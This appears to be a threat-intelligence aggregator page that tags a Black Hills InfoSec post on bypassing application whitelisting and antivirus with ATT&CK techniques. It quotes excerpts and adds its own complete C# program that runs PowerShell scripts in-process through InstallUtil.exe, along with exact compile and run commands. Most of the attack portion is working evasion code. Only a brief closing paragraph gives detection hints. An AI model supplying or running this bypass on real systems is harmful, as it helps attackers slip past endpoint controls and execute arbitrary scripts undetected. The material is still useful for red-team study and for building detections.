TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Black Hills InfoSec

Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV

BHIS · 2016-08-31

ATT&CK techniques detected

9 predictions
T1059.001 PowerShell · 100%
“…a method to execute PowerShell scripts in environments that have application whitelisting enabled and have disabled access to powershell.exe and cmd.exe. You can run virtually any PowerShell script that you want to with this. Just a few items to note though: - make sure your s…”
T1059.001 PowerShell · 100%
“…for executing the Invoke-Shellcode.ps1 file from within a C# program. Essentially, you turn the Invoke-Shellcode.ps1 file into one, long, single line and embed it as a string variable within the C# program. The result is a stand-alone executable that spawns a Meterpre…”
T1059.001 PowerShell · 100%
“Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV. Brian Fehrman (with shout outs to: Kelsey Bellew, Beau Bullock) // In a …”
T1059.001 PowerShell · 99%
“…our program is to define the mycode class and a method named exec. The method reads in a PowerShell script that is located at the path that is defined in the @"" notation. In this case, my PowerShell script is located at C:\Users\fmc\Desktop\PowerUp.ps1. The lines tha…”
T1059.001 PowerShell · 96%
“…your PowerShell scripts do … but why go through all that work when you already have the PowerShell scripts? Enough talk, let’s do this! Create a new, blank text file on your Windows desktop and name it program.cs. You can call it whatever you want … but that’s just a sugge…”
T1218.004 InstallUtil · 93%
“…entry point for our program. We will be using the InstallUtil.exe utility to run our program rather than executing it directly. This is the wizardry that can allow us to bypass application-whitelisting restrictions. In order to do this, we define a class named sample that inhe…”
T1218.004 InstallUtil · 89%
“…we need to run our program by using the InstallUtil.exe utility. This process will be similar to how we used the csc.exe application. Navigate back to: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ Right-click on the InstallUtil.exe file and choose Create Sh…”
T1218.004 InstallUtil · 80%
“…the Properties window. Now, head back to your desktop if you’re not already there. Drag the powerup.exe file onto the InstallUtil shortcut file. You should see a command prompt pop up while the script executes. If you open Task Manager, however, you’ll notice that cmd.exe i…”
T1027.004 Compile After Delivery · 55%
“…\fmc\Desktop\allchecks.txt Now we need to compile our program. We are going to use the csc.exe utility to perform the compilation. We have to pass in a couple of flags in order for the program to properly compile. The following command can be used to compile the program. C…”
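The excerpts above describe one procedure in pieces: a C# source file with a mycode.exec() method that reads a .ps1 from disk and runs it in-process, an Installer-derived class named sample that gives InstallUtil.exe something to call, compilation with csc.exe, and execution through InstallUtil.exe rather than directly. The following is an added example written for this page to show how those pieces fit together; it is not the code from the BHIS post or from Casey Smith's original. The class and method names follow the excerpts, but the script path, the choice of the Uninstall override as the hook, and the compile/run commands in the notes below are assumptions, since the excerpts are cut off before they state them.

```csharp
// Added example, not the post's code. Minimal C# host that executes a PowerShell
// script through System.Management.Automation (no powershell.exe is spawned) and
// exposes that work to InstallUtil.exe through an Installer subclass.
// Assumptions: script path, the Uninstall override as the InstallUtil hook,
// and the build/run commands in the notes.
using System;
using System.Collections;
using System.Collections.ObjectModel;
using System.Configuration.Install;          // Installer base class
using System.IO;
using System.Management.Automation;           // PSObject
using System.Management.Automation.Runspaces; // Runspace, Pipeline
using System.Text;

public class Program
{
    // Ordinary entry point. InstallUtil.exe never calls this; the whitelisted
    // InstallUtil.exe is the process that launches, and the work happens in the
    // installer class below.
    public static void Main()
    {
        Console.WriteLine("Run this assembly through InstallUtil.exe, not directly.");
    }
}

// InstallUtil only instantiates Installer subclasses carrying RunInstaller(true).
[System.ComponentModel.RunInstaller(true)]
public class sample : Installer
{
    // Uninstall is reached when InstallUtil is given the /U switch (assumption:
    // which override the post hooks is cut off in the excerpt). Install() would
    // be the hook for a run without /U.
    public override void Uninstall(IDictionary savedState)
    {
        mycode.exec();
    }
}

public class mycode
{
    // Assumed location; the post reads the script from a path given in @"" notation.
    const string ScriptPath = @"C:\Users\fmc\Desktop\PowerUp.ps1";

    public static void exec()
    {
        string script = File.ReadAllText(ScriptPath);
        Console.WriteLine(RunScript(script));
    }

    // Runs the script text inside an in-process runspace. Because the PowerShell
    // engine is hosted here, a control that blocks powershell.exe and cmd.exe by
    // image name does not apply; the only new process is InstallUtil.exe.
    public static string RunScript(string script)
    {
        using (Runspace rs = RunspaceFactory.CreateRunspace())
        {
            rs.Open();
            using (Pipeline pipe = rs.CreatePipeline())
            {
                pipe.Commands.AddScript(script);
                pipe.Commands.Add("Out-String"); // render output objects as text
                Collection<PSObject> results = pipe.Invoke();
                StringBuilder sb = new StringBuilder();
                foreach (PSObject o in results)
                    sb.Append(o.ToString());
                return sb.ToString();
            }
        }
    }
}
```

Build and run notes (assumed paths, consistent with the v2.0.50727 Framework64 directory the excerpts name): compile with csc.exe from that directory, passing /r: with the full GAC path of System.Management.Automation.dll (under C:\Windows\assembly\GAC_MSIL\System.Management.Automation\...) and /out:powerup.exe program.cs; then run InstallUtil.exe /logfile= /LogToConsole=false /U powerup.exe from the same directory, which is the form the shortcut in the excerpts stands in for. The /logfile= and /LogToConsole=false switches only suppress InstallUtil's own log output. For the defender, the observable is the one the post hints at with its Task Manager remark: no powershell.exe or cmd.exe appears, so detection has to key on InstallUtil.exe starting with /U against an assembly outside a known installer path, and on System.Management.Automation.dll being loaded into a process that is not PowerShell.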

Summary

Brian Fehrman (With shout outs to: Kelsey Bellew, Beau Bullock) // In a previous blog post, we talked about bypassing AV and Application Whitelisting by using a method developed by Casey Smith. In […]

The post Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV appeared first on Black Hills Information Security, Inc.